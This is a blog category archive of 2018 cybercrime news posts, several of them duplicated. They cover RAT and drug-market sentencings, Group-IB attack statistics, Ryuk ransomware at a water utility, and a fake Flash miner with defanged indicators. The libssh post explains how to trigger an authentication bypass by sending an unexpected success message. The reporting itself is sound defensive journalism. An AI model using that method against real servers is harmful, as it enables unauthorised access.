Category Archives: cyber crime

Author of Luminosity RAT Gets 2.5 Years in Federal Prison

By Waqas

Colton Ray Grubbs, 21 from Stanford, Kentucky has been sent to 30 months (2.5 years) in prison for developing and operating the infamous Luminosity RAT or Luminosity Link RAT (Remote Access Trojan) that targeted unsuspected users worldwide. Luminosity RAT allowed hackers to infect targeted devices by automatically disabling the anti-malware or anti-virus program installed on the system to spy […]

This is a post from HackRead.com Read the original post: Author of Luminosity RAT Gets 2.5 Years in Federal Prison

Security Affairs: Group-IB: 14 cyber attacks on crypto exchanges resulted in a loss of $882 million

Group-IB has estimated that crypto exchanges suffered a total loss of $882 million due to targeted attacks between 2017 and 2018.

Group-IB, an international company that specializes in preventing cyber attacks,has estimated that cryptocurrency exchanges suffered a total loss of $882 million due to targeted attacks in 2017 and in the first three quarters of 2018. According to Group-IB experts, at least 14 crypto exchanges were hacked. Five attacks have been linked to North Korean hackers from Lazarus state-sponsored group, including the infamous attack on Japanese crypto exchange Coincheck, when $534million in crypto was stolen.

This data was included in the annual Hi-Tech Crime Trends 2018 report, presented by Group-IB CTO, Dmitry Volkov, at the sixth international CyberСrimeCon conference. A separate report chapter is dedicated to the analysis of hackers’ and fraudsters’ activity in crypto industry.

Crypto exchanges: in the footsteps of Lazarus 

In most cases, cybercriminals, while attacking cryptocurrency exchanges, use traditional tools and methods, such as spear phishing, social engineering, distribution of malware, and website defacement. One successful attack could bring hackers tens of millions of dollars in crypto funds, whilst reducing the risks of being caught to a minimum:  the anonymity of transactions allows cybercriminals to withdraw stolen funds without putting themselves at greater risk.

Spear phishing remains the major vector of attack on corporate networks. For instance, fraudsters deliver malware under the cover of CV spam: they send an email containing a fake CV with the subject line “Engineering Manager for Crypto Currency job” or the file «Investment Proposal.doc» in attachment, that has a malware embedded in the document.

In the last year and a half, the North-Korean state-sponsored Lazarus group attacked at least five cryptocurrency exchanges: Yapizon, Coins, YouBit, Bithumb, Coinckeck. After the local network is successfully compromised, the hackers browse the local network to find workstations and servers used working with private cryptocurrency wallets.

crypto exchanges

“Last year we warned that hackers competent enough to carry out a targeted attack might have a new target – cryptocurrency exchanges,” — reminded Dmitry Volkov, Group-IB CTO.

“In the last couple of years, crypto exchanges suffered many attacks. Some of the exchanges went bankrupt after the hacks, i.e. Bitcurex, YouBit, Bitgrail. At the beginning of 2018 hackers’ interest in cryptocurrency exchanges ramped up. The most likely cryptocurrency exchange attackers now are Silence, MoneyTaker, and Cobalt.”

ICO: more than 56% of funds were stolen through phishing attacks

Hackers cause serious damage to ICOs: they attack founders, community members, and platforms. In 2017 more than 10% of funds raised through ICOs were stolen, while 80% of projects disappeared with the money without fulfilling any obligations towards their investors.

Yet despite the pessimistic forecasts, the number of funds invested in ICOs increased significantly. In H1 of 2018 alone, ICO projects raised almost $14 billion, which is twice as much as during the entire 2017 ($5,5 billion) — according to CVA and PwC studies. Therefore, cybercriminals can steal more funds in one successful attack.

In 2018, hackers attacked ICOs conducting private funding rounds. For instance, cyber criminals targeted TON project, founded by Pavel Durov, through phishing and managed to steal $35,000 in Ethereum. The worst generally happens on the first day of token sales: a set of DDoS attacks simultaneous with an influx of users, the eruption of Telegram and Slack messages, mailing list spamming.

Phishing remains one of the major vectors of attacks on ICOs: approximately 56% of all funds stolen from ICOs were siphoned off as a result of phishing attacks. On the rise of “the crypto-fever” everyone is striving to purchase tokens, often sold at a significant discount, as fast as possible without paying attention to fine details such as fake domain names. One beg phishing group is capable of stealing roughly $1 million a month.

Phishing attacks against ICO projects are not always aimed at stealing money. This year, there were several cases of investor database theft. This information can be later re-sold on the darknet or used for blackmail.

A relatively new method of fraud on the ICO market was stealing a White Paper of an ICO project and presenting an identical idea under a new brand name. Fraudsters build a website to feature a new brand and a new team using the stolen project description and announce an ICO.

Pierluigi Paganini

(Security Affairs – crypto exchanges, hacking)

The post Group-IB: 14 cyber attacks on crypto exchanges resulted in a loss of $882 million appeared first on Security Affairs.



Security Affairs

Group-IB: 14 cyber attacks on crypto exchanges resulted in a loss of $882 million

Group-IB has estimated that crypto exchanges suffered a total loss of $882 million due to targeted attacks between 2017 and 2018.

Group-IB, an international company that specializes in preventing cyber attacks,has estimated that cryptocurrency exchanges suffered a total loss of $882 million due to targeted attacks in 2017 and in the first three quarters of 2018. According to Group-IB experts, at least 14 crypto exchanges were hacked. Five attacks have been linked to North Korean hackers from Lazarus state-sponsored group, including the infamous attack on Japanese crypto exchange Coincheck, when $534million in crypto was stolen.

This data was included in the annual Hi-Tech Crime Trends 2018 report, presented by Group-IB CTO, Dmitry Volkov, at the sixth international CyberСrimeCon conference. A separate report chapter is dedicated to the analysis of hackers’ and fraudsters’ activity in crypto industry.

Crypto exchanges: in the footsteps of Lazarus 

In most cases, cybercriminals, while attacking cryptocurrency exchanges, use traditional tools and methods, such as spear phishing, social engineering, distribution of malware, and website defacement. One successful attack could bring hackers tens of millions of dollars in crypto funds, whilst reducing the risks of being caught to a minimum:  the anonymity of transactions allows cybercriminals to withdraw stolen funds without putting themselves at greater risk.

Spear phishing remains the major vector of attack on corporate networks. For instance, fraudsters deliver malware under the cover of CV spam: they send an email containing a fake CV with the subject line “Engineering Manager for Crypto Currency job” or the file «Investment Proposal.doc» in attachment, that has a malware embedded in the document.

In the last year and a half, the North-Korean state-sponsored Lazarus group attacked at least five cryptocurrency exchanges: Yapizon, Coins, YouBit, Bithumb, Coinckeck. After the local network is successfully compromised, the hackers browse the local network to find workstations and servers used working with private cryptocurrency wallets.

crypto exchanges

“Last year we warned that hackers competent enough to carry out a targeted attack might have a new target – cryptocurrency exchanges,” — reminded Dmitry Volkov, Group-IB CTO.

“In the last couple of years, crypto exchanges suffered many attacks. Some of the exchanges went bankrupt after the hacks, i.e. Bitcurex, YouBit, Bitgrail. At the beginning of 2018 hackers’ interest in cryptocurrency exchanges ramped up. The most likely cryptocurrency exchange attackers now are Silence, MoneyTaker, and Cobalt.”

ICO: more than 56% of funds were stolen through phishing attacks

Hackers cause serious damage to ICOs: they attack founders, community members, and platforms. In 2017 more than 10% of funds raised through ICOs were stolen, while 80% of projects disappeared with the money without fulfilling any obligations towards their investors.

Yet despite the pessimistic forecasts, the number of funds invested in ICOs increased significantly. In H1 of 2018 alone, ICO projects raised almost $14 billion, which is twice as much as during the entire 2017 ($5,5 billion) — according to CVA and PwC studies. Therefore, cybercriminals can steal more funds in one successful attack.

In 2018, hackers attacked ICOs conducting private funding rounds. For instance, cyber criminals targeted TON project, founded by Pavel Durov, through phishing and managed to steal $35,000 in Ethereum. The worst generally happens on the first day of token sales: a set of DDoS attacks simultaneous with an influx of users, the eruption of Telegram and Slack messages, mailing list spamming.

Phishing remains one of the major vectors of attacks on ICOs: approximately 56% of all funds stolen from ICOs were siphoned off as a result of phishing attacks. On the rise of “the crypto-fever” everyone is striving to purchase tokens, often sold at a significant discount, as fast as possible without paying attention to fine details such as fake domain names. One beg phishing group is capable of stealing roughly $1 million a month.

Phishing attacks against ICO projects are not always aimed at stealing money. This year, there were several cases of investor database theft. This information can be later re-sold on the darknet or used for blackmail.

A relatively new method of fraud on the ICO market was stealing a White Paper of an ICO project and presenting an identical idea under a new brand name. Fraudsters build a website to feature a new brand and a new team using the stolen project description and announce an ICO.

Pierluigi Paganini

(Security Affairs – crypto exchanges, hacking)

The post Group-IB: 14 cyber attacks on crypto exchanges resulted in a loss of $882 million appeared first on Security Affairs.

Authorities search & seize properties of GTA V’s “Infamous” cheat developers

By Carolina

Cheat developers are constantly under the radar of Take-Two Interactive and Rockstar Games. Both companies have previously taken legal action against cheat developers for protecting their games including the very popular Grand Theft Auto V (GTA V). Last month, they launched an operation against Australian developers, who had released a well-known mod-menu cheat for GTA […]

This is a post from HackRead.com Read the original post: Authorities search & seize properties of GTA V’s “Infamous” cheat developers

Thousands of servers easy to hack due to a LibSSH Flaw

The Libssh library is affected by a severe flaw that could be exploited by attackers to completely bypass authentication and take over a vulnerable server.

The Secure Shell (SSH) implementation library, the Libssh, is affected by a four-year-old severe vulnerability that could be exploited by attackers to completely bypass authentication and take over a vulnerable server without requiring a password.

The flaw is an authentication-bypass vulnerability that was introduced in Libssh version 0.6 released in 2014,

The issue tracked as CVE-2018-10933 was discovered by Peter Winter-Smith from NCC Group, it ties a coding error in Libssh.

The exploitation of the flaw is very trivial, an attacker only needs to send an “SSH2_MSG_USERAUTH_SUCCESS” message to a server with an SSH connection enabled when it expects an “SSH2_MSG_USERAUTH_REQUEST” message.

libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication, the attacker could successfully authentciate without any credentials.” reads the security advisory.

The library fails to validate if the incoming “successful login” packet was sent by the server or the client, and also fails to check if the authentication process has been successfully completed.

This means that if a remote attacker sends the “SSH2_MSG_USERAUTH_SUCCESS” response to libssh, the library considers that the authentication has been successfully completed.

Thousands of vulnerable servers are exposed online, by querying the Shodan search engine we can see that more than 6,500 servers are affected by the issue.

But before you get frightened, you should know that neither the widely used OpenSSH nor Github’s implementation of libssh was affected by the vulnerability.

The Libssh maintainers addressed the flaw with the release of the libssh versions 0.8.4 and 0.7.6.

Experts pointed out that GitHub and OpenSSH implementations of the libssh library are not affected by the flaw.

Pierluigi Paganini

(Security Affairs – Libssh, CVE-2018-10933)

The post Thousands of servers easy to hack due to a LibSSH Flaw appeared first on Security Affairs.

A crippling ransomware attack hit a water utility in the aftermath of Hurricane Florence

A water utility in the US state of North Carolina suffered a severe ransomware attack in the week after Hurricane Florence hit the East Coast of the U.S.

According to the Onslow Water and Sewer Authority (aka ONWASA) some internal systems were infected with the Emotet malware, but the regular water service was not impacted.

According to ONWASA, the infections would require several of the main databases to be completely recreated, fortunately, no customer information was compromised.

“We are in the middle of another disaster following Hurricane Florence and tropical storm Michael,” CEO Jeff Hudson said employees in a video posted on Facebook,

“With a very sophisticated attack they penetrated our defenses, just as they penetrated the city of Atlanta and Mecklenburg county.”

hurricane florence

ONWASA CEO Jeffrey Hudson confirmed the ransomware attack began on October 4, the IT staff initially thought to have locked out the threat, however, on October 13 the malware started dropping the Ryuk ransomware into the infected systems.

“An ONWASA IT staff member was working was working at 3am and saw the attack,” ONWASA said.

“IT staff took immediate action to protect system resources by disconecting ONWASA from the internet, but the crypto-virus spread quickly along the network encrypting databases and files.”

Operators at the utility did not pay the ransom and opted out to recreate the infected systems.

“Ransom monies would be used to fund criminal, and perhaps terrorist activities in other countries,” ONWASA reasoned. “Furthermore, there is no expectation that payment of a ransom would forestall repeat attacks.”

The incident response had a significant impact on the operations of the utility in a critical moment, the aftermath of the Hurricane Florence.

ONWASA estimates it will take several weeks to rebuild all of the damaged systems, it will not possible for customers to pay the bill online and major delays will affect the service provided by the utility.

The effects of the Hurricane Florence on the Onslow county were important, schools are still closed and local authorities are still working to clean up debris from the massive storm. It has been estimated that costs to restore the ordinary situation will hit $125m.

Pierluigi Paganini

(Security Affairs – Hurricane Florence, ransomware)

The post A crippling ransomware attack hit a water utility in the aftermath of Hurricane Florence appeared first on Security Affairs.

Security Affairs: Online market for counterfeit goods in Russia has reached $1,5 billion

Group-IB: The online market for counterfeit goods in Russia has reached $1,5 billion, while the number of phishing attacks has surpassed 1,200 daily

Group-IB, an international company that specialises in the prevention of cyber attacks, has estimated that online sales of counterfeit goods are now worth $1.5 billion. This information was first made public by experts from Group-IB’s Brand Protection team at the CyberCrimeCon 2018 international cybersecurity conference.

According to Group-IB, the online market for counterfeit goods in Russia has increased by 23% in a year and totaled more than $1.5 billion in 2017, compared to $1.2 billion in 2016.  Fraudsters use their websites to sell household appliances and computer equipment, clothing and footwear, jewelry, accessories, cosmetics, medicinal products, and much more, often at hugely discounted prices – up to 80% off. According to Group-IB’s statistics, every fifth counterfeit product was bought online. On average, Russians spend $78 per year on counterfeit goods.

“For large organisations, the actions of online fraudsters mean not only a direct loss in revenue, but also damaged customer loyalty, brand abuse, and fewer shoppers,” says Andrey Busargin, Director of Brand Protection at Group-IB. “It also leads to a decrease in what we call the psychological price, i.e. the cost that customers are willing to pay for a product from the official retailer. Around 64% of users stop buying a company’s goods after a negative experience.”

 Counterfeit goods are not the only threat to popular brands on the Internet. Scammers create fake websites of known brands, fraudulent promotional campaigns, and fake accounts on social media. In recent years, an often-used fraud method has been fake mobile applications: 36% of users are unable to distinguish between genuine and fake apps, and 60% of the latter request access to the user’s personal data. 

Fraudsters use various ways to deceive users: phishing websites, fake mobile apps, accounts and groups on social media. Phishing remains one of the most common online fraud. According to the experts from Group-IB Brand Protection, around 1,270 phishing attacks are carried out daily. The main goals of phishing resources are stealing money from bank cards and obtaining login credentials to personal accounts.

Scammers do not simply copy a company’s website, brand, logos, and colors in addition to registering a similar domain name; they also use the same promotional methods as the legal resources. To secure the traffic they need, scammers ensure that their websites appear at the top of search engine results: 96% of users click on links found on the first page displayed by search engines. Only 35% of them are official resources, however.

Contextual advertising also plays a role: for only $15, it is possible to buy 100 guaranteed visits to a phishing website. Scammers also buy banner ads, use search engine optimisation (SEO), and social media promotion (every day, around 150 social media users are deceived by fraudsters on average). In addition to technological ways of attracting traffic by using bots that target opinion leaders, scammers do not shy away from the classic tactic of mass email blasts purporting to be from popular brands, with 20% of users opening emails that contain content that is characteristic of malware or phishing.

Given that users blindly trust influencers (68% of people choose goods or services based on feedback on social media), scammers create fake accounts. For example, a fake account in Pavel Durov’s name brought in more than $50000 in only a couple of hours after being created. According to Group-IB, 43% of celebrities and 31% of politicians have fake accounts that use their names.

“Fighting online fraudsters and counterfeiting requires adopting serious countermeasures,” warns AndreyBusargin.

“We advise companies to continuously track phishing resources and monitor references to their brand in domain name databases, search engine results, social media, messengers, and context ads so as to identify scammers hiding behind the company’s brand. It is also important to monitor mobile applications, in both official and unofficial stores, in addition to forums, search engine results, social media, and websites where they might be found. To effectively fight against scammers and fraudsters, it is important to detect and block all the resources connected with a fraudulent website. Fraudsters usually create several phishing websites at once, which can be detected using correlation and website affiliation analysis.”

About the author Group-IB

Group-IB is one the world’s leading providers of solutions aimed at detection and prevention of cyber attacks, fraud exposure and protection of intellectual property on the Internet. GIB Threat Intelligence cyber threats data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

Group-IB’s technological leadership is built on company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55 000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and a round-the-clock centre providing a rapid response to cyber incidents—CERT-GIB.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – counterfeit goods, cybercrime)

The post Online market for counterfeit goods in Russia has reached $1,5 billion appeared first on Security Affairs.



Security Affairs

Online market for counterfeit goods in Russia has reached $1,5 billion

Group-IB: The online market for counterfeit goods in Russia has reached $1,5 billion, while the number of phishing attacks has surpassed 1,200 daily

Group-IB, an international company that specialises in the prevention of cyber attacks, has estimated that online sales of counterfeit goods are now worth $1.5 billion. This information was first made public by experts from Group-IB’s Brand Protection team at the CyberCrimeCon 2018 international cybersecurity conference.

According to Group-IB, the online market for counterfeit goods in Russia has increased by 23% in a year and totaled more than $1.5 billion in 2017, compared to $1.2 billion in 2016.  Fraudsters use their websites to sell household appliances and computer equipment, clothing and footwear, jewelry, accessories, cosmetics, medicinal products, and much more, often at hugely discounted prices – up to 80% off. According to Group-IB’s statistics, every fifth counterfeit product was bought online. On average, Russians spend $78 per year on counterfeit goods.

“For large organisations, the actions of online fraudsters mean not only a direct loss in revenue, but also damaged customer loyalty, brand abuse, and fewer shoppers,” says Andrey Busargin, Director of Brand Protection at Group-IB. “It also leads to a decrease in what we call the psychological price, i.e. the cost that customers are willing to pay for a product from the official retailer. Around 64% of users stop buying a company’s goods after a negative experience.”

 Counterfeit goods are not the only threat to popular brands on the Internet. Scammers create fake websites of known brands, fraudulent promotional campaigns, and fake accounts on social media. In recent years, an often-used fraud method has been fake mobile applications: 36% of users are unable to distinguish between genuine and fake apps, and 60% of the latter request access to the user’s personal data. 

Fraudsters use various ways to deceive users: phishing websites, fake mobile apps, accounts and groups on social media. Phishing remains one of the most common online fraud. According to the experts from Group-IB Brand Protection, around 1,270 phishing attacks are carried out daily. The main goals of phishing resources are stealing money from bank cards and obtaining login credentials to personal accounts.

Scammers do not simply copy a company’s website, brand, logos, and colors in addition to registering a similar domain name; they also use the same promotional methods as the legal resources. To secure the traffic they need, scammers ensure that their websites appear at the top of search engine results: 96% of users click on links found on the first page displayed by search engines. Only 35% of them are official resources, however.

Contextual advertising also plays a role: for only $15, it is possible to buy 100 guaranteed visits to a phishing website. Scammers also buy banner ads, use search engine optimisation (SEO), and social media promotion (every day, around 150 social media users are deceived by fraudsters on average). In addition to technological ways of attracting traffic by using bots that target opinion leaders, scammers do not shy away from the classic tactic of mass email blasts purporting to be from popular brands, with 20% of users opening emails that contain content that is characteristic of malware or phishing.

Given that users blindly trust influencers (68% of people choose goods or services based on feedback on social media), scammers create fake accounts. For example, a fake account in Pavel Durov’s name brought in more than $50000 in only a couple of hours after being created. According to Group-IB, 43% of celebrities and 31% of politicians have fake accounts that use their names.

“Fighting online fraudsters and counterfeiting requires adopting serious countermeasures,” warns AndreyBusargin.

“We advise companies to continuously track phishing resources and monitor references to their brand in domain name databases, search engine results, social media, messengers, and context ads so as to identify scammers hiding behind the company’s brand. It is also important to monitor mobile applications, in both official and unofficial stores, in addition to forums, search engine results, social media, and websites where they might be found. To effectively fight against scammers and fraudsters, it is important to detect and block all the resources connected with a fraudulent website. Fraudsters usually create several phishing websites at once, which can be detected using correlation and website affiliation analysis.”

About the author Group-IB

Group-IB is one the world’s leading providers of solutions aimed at detection and prevention of cyber attacks, fraud exposure and protection of intellectual property on the Internet. GIB Threat Intelligence cyber threats data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

Group-IB’s technological leadership is built on company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55 000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and a round-the-clock centre providing a rapid response to cyber incidents—CERT-GIB.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – counterfeit goods, cybercrime)

The post Online market for counterfeit goods in Russia has reached $1,5 billion appeared first on Security Affairs.

HACKMAGEDDON: January – September 2018 Cyber Attack Statistics

I have decided to write a dedicated blog post with all the attacks recorded so far in 2018 and the related statistics (with interactive charts). Some charts are also compared with the corresponding stats in 2017. The timeline containing all the events, which I will try to keep updated on monthly basis.

HACKMAGEDDON

Security Affairs: Ex-NASA contractor pleaded guilty for cyberstalking crimes

A former NASA contractor has pleaded guilty for a cyberstalking scheme, the man blackmailed seven women threatening to publish their nude pictures.

Richard Bauer (28), an ex-NASA contractor has pleaded guilty for a cyberstalking, the man allegedly threatened to publish nude pictures of the women unless they sent him other explicit pictures.

Richard Bauer of Los Angeles, who worked at NASA’s Armstrong Flight Research Center in Southern California, pleaded guilty for stalking, computer hacking, and aggravated identity theft.

Cyberstalking

The man acknowledged having targeted friends, co-workers, and family members, he used social engineering tricks and also used malware to compromise victims’ systems.

“Bauer acknowledged victimizing friends, family members, high school and college acquaintances and co-workers.” states the Associated Press.

“Bauer, pretending to ask questions on Facebook for a class, got some victims to reveal information he used to reset their online passwords and harvest photos. He got other victims to install computer malware allowing him to access their computers.”

Bauer allegedly threatened to post nude pictures of the victims that he stolen unless they sent more photos.

Pierluigi Paganini

(Security Affairs – cyberstalking, hacking)

The post Ex-NASA contractor pleaded guilty for cyberstalking crimes appeared first on Security Affairs.



Security Affairs

Ex-NASA contractor pleaded guilty for cyberstalking crimes

A former NASA contractor has pleaded guilty for a cyberstalking scheme, the man blackmailed seven women threatening to publish their nude pictures.

Richard Bauer (28), an ex-NASA contractor has pleaded guilty for a cyberstalking, the man allegedly threatened to publish nude pictures of the women unless they sent him other explicit pictures.

Richard Bauer of Los Angeles, who worked at NASA’s Armstrong Flight Research Center in Southern California, pleaded guilty for stalking, computer hacking, and aggravated identity theft.

Cyberstalking

The man acknowledged having targeted friends, co-workers, and family members, he used social engineering tricks and also used malware to compromise victims’ systems.

“Bauer acknowledged victimizing friends, family members, high school and college acquaintances and co-workers.” states the Associated Press.

“Bauer, pretending to ask questions on Facebook for a class, got some victims to reveal information he used to reset their online passwords and harvest photos. He got other victims to install computer malware allowing him to access their computers.”

Bauer allegedly threatened to post nude pictures of the victims that he stolen unless they sent more photos.

Pierluigi Paganini

(Security Affairs – cyberstalking, hacking)

The post Ex-NASA contractor pleaded guilty for cyberstalking crimes appeared first on Security Affairs.

Security Affairs newsletter Round 184 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      APT28 group return to covert intelligence gathering ops in Europe and South America.
·      D-Link fixed several flaws in Central WiFiManager access point management tool
·      Expert presented a new attack technique to compromise MikroTik Routers
·      Google was aware of a flaw that exposed over 500,000 of Google Plus users, but did not disclose it
·      Kaspersky shed lights on the overlap of operations conducted by Turla and Sofacy
·      The Git Project addresses a critical arbitrary code execution vulnerability in Git
·      WECON PI Studio HMI software affected by code execution flaws
·      BEC scams, hacked accounts available from $150 up to $5,000
·      How Secure Are Bitcoin Wallets, Really?
·      Project Strobe, what will change after the Google security breach?
·      Researchers presented an improved version of the WPA KRACK attack
·      CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East
·      GAO report reveals new Pentagon weapon systems vulnerable to hack
·      Group-IB: $49.4 million of damage caused to Russias financial sector from cyber attacks
·      Hackers can compromise your WhatsApp account by tricking you into answering a video call
·      Millions of Xiongmai video surveillance devices can be easily hacked via cloud feature
·      Exaramel Malware Links Industroyer ICS malware and NotPetya wiper
·      Juniper Networks provides dozens of fix for vulnerabilities in Junos OS
·      New Gallmaker APT group eschews malware in cyber espionage campaigns
·      SAP October 2018 set of patches fixes first Hot News security note for SAP BusinessObjects in 5 years
·      DOM-XSS Bug Affecting Tinder, Shopify, Yelp, and More
·      Facebook Data Breach Update: attackers accessed data of 29 Million users
·      Fitmetrix fitness software company may have exposed millions of customer records
·      Five Eyes Intelligence agencies warn of popular hacking tools
·      Hackers targeting Drupal vulnerabilities to install the Shellbot Backdoor
·      Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update
·      NHS is still assessing the cost of WannaCry one year later
·      Pentagon Defense Department travel records data breach

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 184 – News of the week appeared first on Security Affairs.

Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update

Security experts from Palo Alto Networks warn of fake Adobe Flash update hiding a miner that works as legitimate update and really update the software.

A fake Adobe Flash update actually was used as a vector for a malicious cryptocurrency miner, the novelty in this last campaign is represented by the tricks used by attackers to stealthily drop the malware.

The fake Adobe Flash update has been actively used in a campaign since this summer, it borrows the code from the legitimate update and also updates victims’ software, but it also includes the code to download an XMRig cryptocurrency miner on Windows systems.

“However, a recent type of fake Flash update has implemented additional deception. As early as August 2018, some samples impersonating Flash updates have borrowed pop-up notifications from the official Adobe installer.” reads the analysis published by Palo Alto Networks.

“These fake Flash updates install unwanted programs like an XMRig cryptocurrency miner, but this malware can also update a victim’s Flash Player to the latest version.”

fake Adobe Flash update

 

The fake Adobe Flash updates use file names starting with AdobeFlashPlayer that are hosted on cloud-based web servers that don’t belong to Adobe.

The downloads always include the string “flashplayer_down.php?clickid=” in the URL.

At the time of the report, it is still unclear the way attackers were spreading the URLs delivering the fake Adobe Flash update.

The domain is associated with other updaters or installers pushing cryptocurrency miners and other unwanted software

Network traffic analysis revealed the infected Windows hosts connect to [osdsoft[.]com] via HTTP POST request. This domain was associated with updaters or installers pushing cryptocurrency miners.

“This domain is associated with updaters or installers pushing cryptocurrency miners and other unwanted software. One such example from December 2017 named free-mod-menu-download-ps3.exe also shows osdsoft[.]com followed by XMRig traffic on TCP port 14444 like the example used in this blog.” continues the report.

“However, other malware samples reveal osdsoft[.]com is associated with other unwanted programs usually classified as malware.”

PaloAlto Networks experts highlighted that potential victims will still receive warning messages about running downloaded files on their Windows computer.

“This campaign uses legitimate activity to hide distribution of cryptocurrency miners and other unwanted programs,” concludes the analysis.

 “Organizations with decent web filtering and educated users have a much lower risk of infection by these fake updates.

Pierluigi Paganini

(Security Affairs – fake Adobe Flash update, hacking)

The post Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update appeared first on Security Affairs.

Security Affairs: Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update

Security experts from Palo Alto Networks warn of fake Adobe Flash update hiding a miner that works as legitimate update and really update the software.

A fake Adobe Flash update actually was used as a vector for a malicious cryptocurrency miner, the novelty in this last campaign is represented by the tricks used by attackers to stealthily drop the malware.

The fake Adobe Flash update has been actively used in a campaign since this summer, it borrows the code from the legitimate update and also updates victims’ software, but it also includes the code to download an XMRig cryptocurrency miner on Windows systems.

“However, a recent type of fake Flash update has implemented additional deception. As early as August 2018, some samples impersonating Flash updates have borrowed pop-up notifications from the official Adobe installer.” reads the analysis published by Palo Alto Networks.

“These fake Flash updates install unwanted programs like an XMRig cryptocurrency miner, but this malware can also update a victim’s Flash Player to the latest version.”

fake Adobe Flash update

 

The fake Adobe Flash updates use file names starting with AdobeFlashPlayer that are hosted on cloud-based web servers that don’t belong to Adobe.

The downloads always include the string “flashplayer_down.php?clickid=” in the URL.

At the time of the report, it is still unclear the way attackers were spreading the URLs delivering the fake Adobe Flash update.

The domain is associated with other updaters or installers pushing cryptocurrency miners and other unwanted software

Network traffic analysis revealed the infected Windows hosts connect to [osdsoft[.]com] via HTTP POST request. This domain was associated with updaters or installers pushing cryptocurrency miners.

“This domain is associated with updaters or installers pushing cryptocurrency miners and other unwanted software. One such example from December 2017 named free-mod-menu-download-ps3.exe also shows osdsoft[.]com followed by XMRig traffic on TCP port 14444 like the example used in this blog.” continues the report.

“However, other malware samples reveal osdsoft[.]com is associated with other unwanted programs usually classified as malware.”

PaloAlto Networks experts highlighted that potential victims will still receive warning messages about running downloaded files on their Windows computer.

“This campaign uses legitimate activity to hide distribution of cryptocurrency miners and other unwanted programs,” concludes the analysis.

 “Organizations with decent web filtering and educated users have a much lower risk of infection by these fake updates.

Pierluigi Paganini

(Security Affairs – fake Adobe Flash update, hacking)

The post Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update appeared first on Security Affairs.



Security Affairs

Dark web kingpin visiting US for beard competition gets 20 years in prison

By Waqas

Dream Market Drug Vendor arrived in the US to participate in a beard competition in Texas. A Dark Web drug dealer has received 240 months or 20 years in prison after he pleaded guilty to the crimes of laundering money and possessing controlled substances with the intention of distributing them. The convict, Gal Vallerius, is […]

This is a post from HackRead.com Read the original post: Dark web kingpin visiting US for beard competition gets 20 years in prison

Security Affairs: Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks

Security firm Group-IB has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector

Group-IB, an international company that specializes in preventing cyber attacks, has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector. As stated in Group-IB’s annual report “Hi-Tech Crime Trends 2018” presented at the CyberCrimeCon18 conference, every month, 1-2 banks lose money as a result of cyber attacks, and the damage caused by one successful theft is, on average, $2 million.

“Financial motivation still prevails among APT-groups, however stolen money — is not the most dangerous thing that could happen to a financial organization”, — says Ilya Sachkov, Group-IB CEO and founder.  “Since in many countries banks are considered critical infrastructure, they are the targets for state-sponsored hacker groups, specialized in sabotage. One successful attack is capable of destroying one   financial organization and even the collapse of a state financial system. Considering this, banks need to rethink their approach to protection against cyber threats. Defense is an outdated strategy. It’s time to stop being victims and become hunters.”

financial sector Russia attacks

In the new report, Group-IB experts described in detail the cyber threats to the financial sector—active APT groups, tactics of the attackers, infection vectors, and new hacker tools.

Targeted attacks on banks:

Active groups and withdrawal methods

Group-IB identifies 4 criminal APT groups that pose a real threat to the financial sector: not only are they able to penetrate a bank’s network and access isolated financial systems, but they can also successfully withdraw money via SWIFT, AWS CBR, card processing and ATMs. These groups are Cobalt, MoneyTaker, Silence, which are led by Russian-speaking hackers, and the North Korean group Lazarus.

Only two criminal groups pose a threat to the SWIFT interbank transfer system: Lazarus and Cobalt, the latter of which, at the end of 2017, conducted the first successful attack in the history of Russia’s financial sector on a bank using SWIFT. According to Group-IB estimates, the number of targeted attacks on banks to conduct thefts via SWIFT in the reporting period increased threefold. In the previous period, three such attacks were recorded: in Hong Kong, Ukraine, and Turkey. In this period, however, there have already been 9 successful attacks in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. The good news is that with SWIFT most of the unauthorized transfers can be stopped in time and returned to the banks affected.

Attacks on card processing remain one of the main methods of theft and they are actively used by hackers from Cobalt, MoneyTaker, and Silence. In February 2018, members of Silence conducted a successful attack on a bank and stole money via card processing: they managed to withdraw $522,000 (35 million rubles) from cards via the ATMs of a partner bank. Focusing attacks on ATMs and card processing led to a reduction in the average amount of damage from one attack. However, they allow attackers to conduct these attacks more securely for “drops” who cash out the stolen money. The attackers are in one country, their victim (the bank) in another, and the cashing out is done in a third country.

